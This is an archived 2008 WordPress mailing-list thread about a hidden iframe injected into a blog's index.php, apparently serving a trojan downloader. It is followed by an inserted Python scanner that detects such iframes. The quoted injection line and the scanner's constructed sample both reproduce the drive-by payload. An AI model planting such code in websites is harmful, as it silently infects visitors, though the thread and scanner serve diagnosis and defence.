[wp-hackers] XSS vuln in wordpress 2.7 ?

Peter van der Does peter at avirtualhome.com
Mon Dec 22 18:31:11 GMT 2008


On Mon, 22 Dec 2008 19:27:21 +0200
madalin <niladam at gmail.com> wrote:

> Hello,
> 
> For some reason I found my blog's index.php (not theme's index.php)
> with the following piece of code right before the ?>
> 
> echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
> height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
> 
> I tried looking at the logs. No luck. The file's permissions look like
> this:
> 
> -rw-r--r-- 1 madalin madalin 557 Dec 22
> 15:50 /home/madalin/www/index.php
> 
> I'm still trying to figure out how that line got there. I've
> downloaded wordpress right from wordpress.org, and the server is a
> dedicated one, only two users with shell access to it.
> 
> Any suggestions?
> 
It doesn't seem to be WordPress related. I found one site running phpBB
which is also infected. I don't know Brazilian
(http://www.phpbbrasil.com.br/phpBB/viewtopic.php?f=37&t=21344&p=191869),
but what I gather is that it links to a page with the
Trojan-Downloader.JS.Tabletka.a virus.

I'll keep digging :)
 
-- 
Peter van der Does

GPG key: E77E8E98

WordPress Plugin Developer
http://blog.avirtualhome.com

GetDeb Package Builder/GetDeb Site Coder
http://www.getdeb.net - Software you want for Ubuntu
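As an added example (not code from this thread, from WordPress or from phpBB), a small Python scanner that flags hidden or 1x1 iframes emitted from PHP source, the injection pattern the quoted message describes; the sample index.php content, the theme snippet and the malicious.example domain are constructed placeholders.

```python
import re
from pathlib import Path
from typing import Dict, List

# Opening <iframe> tag, plus the attributes that mark an injected hidden frame.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*\\?["']?([^\s"'\\>]+)""", re.IGNORECASE)
DIM_RE = re.compile(r"""\b(width|height)\s*=\s*\\?["']?(\d+)""", re.IGNORECASE)
HIDDEN_STYLE_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)

# Constructed sample: a WordPress-style index.php with an injected echo before ?>
SAMPLE_INDEX_PHP = r'''<?php
/** Loads the WordPress environment and template. (constructed sample) */
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
echo "<iframe src=\"http://malicious.example/?click=123\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>
'''
# Constructed sample: a legitimate, visible embed in a theme file (should not be flagged).
SAMPLE_THEME_HTML = '<div><iframe src="https://video.example/embed/1" width="560" height="315"></iframe></div>'

def iframe_is_hidden(tag: str) -> bool:
    """True if the iframe is 1x1 or smaller, or hidden via inline CSS."""
    dims = {k.lower(): int(v) for k, v in DIM_RE.findall(tag)}
    tiny = dims.get("width", 999) <= 1 and dims.get("height", 999) <= 1
    return tiny or bool(HIDDEN_STYLE_RE.search(tag))

def scan_php_source(name: str, source: str) -> List[Dict[str, object]]:
    """Return one finding per hidden iframe, with line number, src and whether PHP echoes it."""
    findings = []
    for m in IFRAME_RE.finditer(source):
        tag = m.group(0)
        if not iframe_is_hidden(tag):
            continue
        lineno = source.count("\n", 0, m.start()) + 1
        line_start = source.rfind("\n", 0, m.start()) + 1
        prefix = source[line_start:m.start()]          # text before the tag on its line
        src = SRC_RE.search(tag)
        findings.append({"file": name, "line": lineno,
                         "src": src.group(1) if src else None,
                         "in_php_echo": bool(re.search(r"\b(echo|print)\b", prefix))})
    return findings

def scan_directory(root: str) -> List[Dict[str, object]]:
    """Walk a web root and scan every .php file (hypothetical helper for real use)."""
    results = []
    for path in Path(root).rglob("*.php"):
        results.extend(scan_php_source(str(path), path.read_text(errors="replace")))
    return results

if __name__ == "__main__":
    for f in scan_php_source("index.php", SAMPLE_INDEX_PHP):
        print(f"{f['file']}:{f['line']} hidden iframe -> {f['src']} (inside PHP echo: {f['in_php_echo']})")
```

A hit inside a core file such as index.php is a strong sign of tampering; compare the file against a freshly downloaded copy of the same WordPress release and check the file's mtime against shell and FTP logs for the same window.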


More information about the wp-hackers mailing list